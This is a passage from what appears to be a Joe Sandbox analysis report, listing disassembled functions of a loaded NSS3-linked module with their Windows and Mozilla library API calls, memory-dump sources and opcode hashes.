                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C4E80C0
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C4E811C
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C4E8134
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$Monitor$Enter$CriticalExitSection$Error$CountEntryLeave
                                                                                                                                                                                                                                                      • String ID: )
                                                                                                                                                                                                                                                      • API String ID: 3537756449-2427484129
                                                                                                                                                                                                                                                      • Opcode ID: 7ca2fec3ce1fb7148dfd02bcd1a9cec299979b1f8e722e87bda68d68e89bb960
                                                                                                                                                                                                                                                      • Instruction ID: 57eb9e410817098d8eee4ef69d836629d150dc809857a5d65e39993648fdaa8d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ca2fec3ce1fb7148dfd02bcd1a9cec299979b1f8e722e87bda68d68e89bb960
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C511971A047049BEB11DB389C01FEBB7B0AF5A31EF06052DD95956B42E731A909C792
                                                                                                                                                                                                                                                      Function 6C48FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C48FCBD
                                                                                                                                                                                                                                                      • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C48FCCC
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C48FCEF
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C48FD32
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C48FD46
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000001), ref: 6C48FD51
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C48FD6D
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C48FD84
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                                                                                                                                                                                      • String ID: :
                                                                                                                                                                                                                                                      • API String ID: 183580322-336475711
                                                                                                                                                                                                                                                      • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                                                      • Instruction ID: 91b7e9e58499c9b08f27662ba53e48f224bfa92b53b57ed46471695e462ab7f1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE31B3B6A032159BFB01CAA49C05FAF77F8AF44319F150128DD15A7B00E7B1EA09C7D2
                                                                                                                                                                                                                                                      Function 6C470F30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C470F62
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C470F84
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,6C48F59B,6C59890C,?), ref: 6C470FA8
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C470FC1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C470FDB
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C470FEF
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C471001
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C471009
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                      • API String ID: 2061345354-3315324353
                                                                                                                                                                                                                                                      • Opcode ID: 4f955fa416b966a6b7c5eae195409bcfd94d74ee1fe2483714fe6a8b8c2d8756
                                                                                                                                                                                                                                                      • Instruction ID: cd2ef703a75af7cc390d416ada0769d91535c70556cc1c0beb19303859c8eecb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f955fa416b966a6b7c5eae195409bcfd94d74ee1fe2483714fe6a8b8c2d8756
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3721E1B1904344AAE710EF24DC41EEA77B8EF44259F018919FC189A701F732A906CBE2
                                                                                                                                                                                                                                                      Function 6C476DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECITEM_ArenaDupItem_Util.NSS3(?,6C477D8F,6C477D8F,?,?), ref: 6C476DC8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C4CFE08
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C4CFE1D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C4CFE62
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C477D8F,?,?), ref: 6C476DD5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C598FA0,00000000,?,?,?,?,6C477D8F,?,?), ref: 6C476DF7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C476E35
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C4CFE29
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C4CFE3D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C4CFE6F
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C476E4C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C598FE0,00000000), ref: 6C476E82
                                                                                                                                                                                                                                                        • Part of subcall function 6C476AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6C47B21D,00000000,00000000,6C47B219,?,6C476BFB,00000000,?,00000000,00000000,?,?,?,6C47B21D), ref: 6C476B01
                                                                                                                                                                                                                                                        • Part of subcall function 6C476AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6C476B8A
                                                                                                                                                                                                                                                      • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C476F1E
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C476F35
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C598FE0,00000000), ref: 6C476F6B
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,6C477D8F,?,?), ref: 6C476FE1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 587344769-0
                                                                                                                                                                                                                                                      • Opcode ID: 4c48124bcf43919a323236c3f8ae43798647fcfef99f2ac91427e61daffe9687
                                                                                                                                                                                                                                                      • Instruction ID: 0fe247ac02f9263485040941d74ddfb011d7347939321039eb5be1848be25b8e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c48124bcf43919a323236c3f8ae43798647fcfef99f2ac91427e61daffe9687
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF716D71E106469BEB10CF65CD40FEABBB5BF95308F154229E808D7B11E770EA94CBA1
                                                                                                                                                                                                                                                      Function 6C4B0FE0 Relevance: 15.2, APIs: 10, Instructions: 192memorystringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4B1057
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4B1085
                                                                                                                                                                                                                                                      • PK11_GetAllTokens.NSS3 ref: 6C4B10B1
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B1107
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4B1172
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B1182
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4B11A6
                                                                                                                                                                                                                                                      • SECITEM_ItemsAreEqual_Util.NSS3(?,?), ref: 6C4B11C5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B52C0: TlsGetValue.KERNEL32(?,00000001,00000002,?,?,?,?,?,?,?,?,?,?,6C48EAC5,00000001), ref: 6C4B52DF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B52C0: EnterCriticalSection.KERNEL32(?), ref: 6C4B52F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B52C0: PR_Unlock.NSS3(?), ref: 6C4B5358
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C4B11D3
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C4B11F3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Utilfree$Alloc_Error$CriticalEnterEqual_ItemsK11_SectionTokensUnlockValuestrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1549229083-0
                                                                                                                                                                                                                                                      • Opcode ID: 60c26b1fcfc869f859ffb4e61f25aa072b7ddc197a32db3664ca6451324c8141
                                                                                                                                                                                                                                                      • Instruction ID: d6707033fdee83706fb600886072264aeeede3056d45eba3eab3fd4dc1cdf00c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60c26b1fcfc869f859ffb4e61f25aa072b7ddc197a32db3664ca6451324c8141
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 436170B4E013459BEB00DF68DC85FAEB7B5AF48348F154128E819BB741EB31E945CBA1
                                                                                                                                                                                                                                                      Function 6C4BADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE10
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE24
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,6C49D079,00000000,00000001), ref: 6C4BAE5A
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE6F
                                                                                                                                                                                                                                                      • free.MOZGLUE(85145F8B,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE7F
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEB1
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEC9
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEF1
                                                                                                                                                                                                                                                      • free.MOZGLUE(6C49CDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6C49CDBB,?), ref: 6C4BAF0B
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAF30
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 161582014-0
                                                                                                                                                                                                                                                      • Opcode ID: 55980e2b6ce546cabeb08cba0a9964858f1cf0bfd8921e9fab2c7f4b5258255c
                                                                                                                                                                                                                                                      • Instruction ID: 05a5371851abd9097696b3478568f419cec27d16e6b3231ad0e20b5d94c90a5b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55980e2b6ce546cabeb08cba0a9964858f1cf0bfd8921e9fab2c7f4b5258255c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15516CB5A01A01ABDB01DF29D884F5AB7B4BF05319F144668E818ABF11E731F964CBE1
                                                                                                                                                                                                                                                      Function 6C494CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,00000000,00000000,?,6C49AB7F,?,00000000,?), ref: 6C494CB4
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C,?,6C49AB7F,?,00000000,?), ref: 6C494CC8
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,6C49AB7F,?,00000000,?), ref: 6C494CE0
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,6C49AB7F,?,00000000,?), ref: 6C494CF4
                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(?,?,?,6C49AB7F,?,00000000,?), ref: 6C494D03
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,00000000,?), ref: 6C494D10
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      • PR_Now.NSS3(?,00000000,?), ref: 6C494D26
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DC6
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DD1
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C539DED
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,00000000,?), ref: 6C494D98
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C494DDA
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C494E02
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4032354334-0
                                                                                                                                                                                                                                                      • Opcode ID: ad6743c83d7e718c9af763820db3913bbc4b63f19d478c064bce7fd92d582288
                                                                                                                                                                                                                                                      • Instruction ID: dbc52544bf2e53cf3879094097ce7b25eaf0618f0e20efed686690dcee077d6e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad6743c83d7e718c9af763820db3913bbc4b63f19d478c064bce7fd92d582288
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E41E7B9A006119BEB01EF28EC44D667BB8BF1525DF055274EC1987B21FB31E914C7E1
                                                                                                                                                                                                                                                      Function 6C47BFF0 Relevance: 15.1, APIs: 10, Instructions: 96memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C47BFFB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000018C), ref: 6C47C015
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(-00000004,00000000,00000188), ref: 6C47C032
                                                                                                                                                                                                                                                      • DER_SetUInteger.NSS3(00000000,00000078,00000000), ref: 6C47C04D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C69E0: PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C4C6A47
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C69E0: memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 6C4C6A64
